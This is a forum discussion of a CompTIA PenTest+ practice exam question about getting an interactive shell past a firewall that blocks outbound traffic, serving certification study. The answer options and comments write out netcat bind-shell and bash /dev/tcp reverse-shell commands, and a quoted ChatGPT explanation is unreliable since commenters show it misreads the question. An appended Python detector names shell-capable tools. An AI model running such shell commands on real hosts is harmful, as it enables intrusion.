Exam PT0-002 topic 1 question 416 discussion

Actual exam question from CompTIA's PT0-002
Question #: 416
Topic #: 1

After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

  • A. bash -i >& /dev/tcp 8443 0>&1
  • B. nc -e host 8443 /bin/bash
  • C. nc -vlp 8443 /bin/bash
  • D. nc -vp 8443 /bin/bash
Suggested Answer: C

Comments

Snagggggin
2 months, 3 weeks ago
Selected Answer: C
It's C. The outbound connection attempt from A would be blocked.
upvoted 2 times
GS1981
3 months, 1 week ago
Selected Answer: C
The firewall is blocking outbound traffic from the remote host, so I would think you need to set up a bind shell, which means a listener (l), so nc -vlp 8443 -e /bin/bash for me is the answer. However, the -e is left off the answer (maybe that's a typo).
upvoted 3 times
Alex818119
3 months, 1 week ago
Selected Answer: A
Chat GPT: explanation: The key part of the question is that outbound traffic is blocked by a firewall. To overcome this, the penetration tester needs to execute a reverse shell from the compromised host that initiates an outbound connection to the attacker's machine. The command must also ensure compatibility with typical Unix-based systems. Option A: bash -i >& /dev/tcp/<attacker_ip>/8443 0>&1 This command creates a reverse shell using Bash. Here is how it works: bash -i: Starts an interactive Bash shell. >& /dev/tcp/<attacker_ip>/8443: Redirects input and output streams to a TCP socket connected to the attacker's IP on port 8443. 0>&1: Links standard input to the output, enabling two-way communication. Since it originates the connection from the compromised host to the attacker's system, it bypasses firewalls blocking inbound traffic.
upvoted 2 times
kinny4000
2 months, 2 weeks ago
"Outbound" traffic means traffic from the target to the attacker. This means a reverse shell would be blocked. If it said inbound then you would be correct.
upvoted 2 times
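
Seen from the defender's side, the bind shell discussed in this thread appears as a new listening socket on the host. The following is an added example, not part of the original discussion: it parses `ss -tlnp` output and flags remotely reachable listeners that break a baseline. The sample rows, the port allowlist and the process-name list are constructed assumptions.

```python
import re

# Constructed sample of `ss -tlnp` output (not captured from a real host).
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    [::]:443           [::]:*            users:(("nginx",pid=990,fd=6),("nginx",pid=989,fd=6))
LISTEN 0      244    127.0.0.1:5432     0.0.0.0:*         users:(("postgres",pid=701,fd=5))
LISTEN 0      1      0.0.0.0:8443       0.0.0.0:*         users:(("nc",pid=4411,fd=3))
"""

# Assumed policy for this example: adjust to the host's real baseline.
ALLOWED_PORTS = {22, 443}
SHELL_CAPABLE = {"nc", "ncat", "netcat", "socat", "bash", "sh"}
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_listeners(text):
    """Return one dict per LISTEN row: address, port, owning process names."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header or non-listening socket
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        names = sorted({n for n, _ in PROC_RE.findall(" ".join(fields[5:]))})
        rows.append({"addr": addr, "port": int(port), "procs": names})
    return rows


def flag_bind_shell_candidates(rows):
    """Flag remotely reachable listeners that break the baseline."""
    findings = []
    for row in rows:
        if row["addr"].startswith("127.") or row["addr"] == "[::1]":
            continue  # loopback only: not reachable through the firewall
        reasons = []
        if row["port"] not in ALLOWED_PORTS:
            reasons.append("port not in allowlist")
        hits = SHELL_CAPABLE.intersection(row["procs"])
        if hits:
            reasons.append("owned by " + ",".join(sorted(hits)))
        if reasons:
            findings.append((row["port"], reasons))
    return findings


if __name__ == "__main__":
    for port, reasons in flag_bind_shell_candidates(parse_listeners(SAMPLE_SS_OUTPUT)):
        print(f"review listener on port {port}: {'; '.join(reasons)}")
```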
Community vote distribution
A (35%)
C (25%)
B (20%)
Other